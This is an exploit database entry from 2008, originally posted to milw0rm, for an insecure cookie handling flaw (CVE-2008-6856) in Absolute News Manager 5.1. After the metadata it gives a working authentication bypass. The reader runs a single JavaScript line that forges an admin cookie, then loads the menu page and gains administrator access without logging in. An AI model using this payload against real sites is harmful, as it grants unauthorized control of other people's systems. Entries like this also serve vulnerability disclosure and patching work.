Absolute News Manager 5.1 - Insecure Cookie Handling

Author: Hakxer
type: webapps
platform: php
port: 
date_added: 2008-10-30 
date_updated:  
verified: 1 
codes: OSVDB-55916;CVE-2008-6856 
tags: 
aliases:  
screenshot_url:  
application_url: 

#################################################################################
## Discovered by : Hakxer                                                       #
## Script : Absolute News Manager :http://www.xigla.com/absolutenmnet/demo.htm  #
## Greetz : Allah , Egyptian x Hacker , SQL_Inj4ct0r , Stealth , All my team    #
## Team : EgY Coders Team                                                       #
## ----------------------------Start Exploit----------------------------------- #
## First Go to http://www.xigla.com/absolutenmnet/demo/login.aspx
## Execute JS Code : javascript:document.cookie="xlaANMadmin_demo=usr=1&lvl=2&uniqueid=&permissions=upload,relate";
## Second Go to http://www.xigla.com/absolutenmnet/demo/menu.aspx
## _=END=_
#############################################################################

# milw0rm.com [2008-10-31]